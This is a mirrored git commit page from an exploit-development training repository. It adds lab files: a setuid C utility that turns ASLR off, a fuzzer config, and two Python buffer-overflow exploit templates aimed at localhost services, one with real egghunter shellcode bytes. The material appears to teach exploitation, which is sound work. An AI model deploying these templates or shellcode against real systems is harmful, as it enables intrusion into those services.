mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-21 18:33:03 +00:00
Add files via upload
This commit is contained in:
parent
0940710459
commit
f7f9524190
8 changed files with 115 additions and 0 deletions
BIN
exploit_development/aslr_changer
Normal file
BIN
exploit_development/aslr_changer
Normal file
Binary file not shown.
29
exploit_development/aslr_changer.c
Normal file
29
exploit_development/aslr_changer.c
Normal file
|
@ -0,0 +1,29 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
FILE *fp;
|
||||
char buff[100];
|
||||
|
||||
if(seteuid(0) == -1) {
|
||||
fprintf(stderr, "Failed to set UID to root - is this binary setuid root?\n");
|
||||
return -1;
|
||||
}
|
||||
|
||||
if(argc != 2 || (strcmp(argv[1], "0") != 0 && strcmp(argv[1], "2") != 0)) {
|
||||
fprintf(stderr, "Usage: %s [0 or 2]\nSets randomize_va_space to 0 (ASLR off) or 2 (ASLR on)\n", argv[0]);
|
||||
return -1;
|
||||
}
|
||||
|
||||
fp = fopen("/proc/sys/kernel/randomize_va_space", "w");
|
||||
fprintf(fp, "%s\n", argv[1]);
|
||||
fclose(fp);
|
||||
|
||||
fp = fopen("/proc/sys/kernel/randomize_va_space", "r");
|
||||
fgets(buff, 99, fp);
|
||||
fclose(fp);
|
||||
|
||||
printf("randomize_va_space is now %s", buff);
|
||||
return 0;
|
||||
}
|
BIN
exploit_development/chatserver-smallbuffer
Normal file
BIN
exploit_development/chatserver-smallbuffer
Normal file
Binary file not shown.
4
exploit_development/gdbinit.txt
Normal file
4
exploit_development/gdbinit.txt
Normal file
|
@ -0,0 +1,4 @@
|
|||
source /root/s5/archive/peda-master/peda.py
|
||||
set disassembly-flavor intel
|
||||
set follow-fork-mode parent
|
||||
#source /root/.gdbinit-gef.py
|
13
exploit_development/httpdpost.fuzzer
Normal file
13
exploit_development/httpdpost.fuzzer
Normal file
|
@ -0,0 +1,13 @@
|
|||
outbound fuzz 'POST /arbitrarydataarbitrarydataarbitrarydataarbitrarydata\r\n\r\n\n'
|
||||
# String to match in the response
|
||||
inbound '404'
|
||||
# What port the fuzzer tries to connect to
|
||||
port 8080
|
||||
# What protocol to use
|
||||
proto tcp
|
||||
# How long to wait on a response
|
||||
receiveTimeout 1
|
||||
# How long to wait between retrying test cases
|
||||
failureTimeout 5
|
||||
# Number of times to retry a test case
|
||||
failureThreshold 3
|
BIN
exploit_development/libhttpd
Normal file
BIN
exploit_development/libhttpd
Normal file
Binary file not shown.
26
exploit_development/sockets_example.py
Normal file
26
exploit_development/sockets_example.py
Normal file
|
@ -0,0 +1,26 @@
|
|||
import socket
|
||||
import sys
|
||||
import threading
|
||||
import struct
|
||||
|
||||
IP = "127.0.0.1"
|
||||
PORT=8080
|
||||
|
||||
jmpesp = ????
|
||||
offset = ????
|
||||
|
||||
buf = ????
|
||||
|
||||
payload = ????
|
||||
payload = "POST %s\r\n\r\n" % payload
|
||||
|
||||
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
sock.settimeout(2)
|
||||
sock.connect((IP,PORT))
|
||||
sock.send(payload)
|
||||
print "Buffer sent! (len %d)" % len(payload)
|
||||
try:
|
||||
print sock.recv(4096)
|
||||
print "No crash...."
|
||||
except:
|
||||
print "Server died, Yayyyy!!"
|
43
exploit_development/triple_socket_template.py
Normal file
43
exploit_development/triple_socket_template.py
Normal file
|
@ -0,0 +1,43 @@
|
|||
#!/usr/bin/python
|
||||
import os
|
||||
import socket
|
||||
import sys
|
||||
import threading
|
||||
import struct
|
||||
import time
|
||||
|
||||
HOST="127.0.0.1"
|
||||
PORT=2501
|
||||
|
||||
# Matt Miller Access() egghunter, triggers on "W00TW00T"
|
||||
egghunter = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
|
||||
egghunterPayload = ?
|
||||
msgPayload = ?
|
||||
|
||||
# Connect one user
|
||||
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock1.connect((HOST, PORT))
|
||||
sock1.send("usr1\r\n")
|
||||
sock1.recv(1024)
|
||||
print "Connected first user"
|
||||
|
||||
# Connect a second user and message the first with the egg
|
||||
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock2.connect((HOST, PORT))
|
||||
sock2.send("usr2\r\n")
|
||||
sock2.recv(1024)
|
||||
time.sleep(1)
|
||||
print "Connected second user"
|
||||
sock2.send(msgPayload)
|
||||
print "Sent msg payload"
|
||||
|
||||
# Connect a final user to trigger egghunter in username
|
||||
sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock3.connect((HOST, PORT))
|
||||
sock3.send(egghunterPayload)
|
||||
print "Sent egghunter payload"
|
||||
|
||||
# Close down
|
||||
sock3.close()
|
||||
sock2.close()
|
||||
sock1.close()
|
Loading…
Reference in a new issue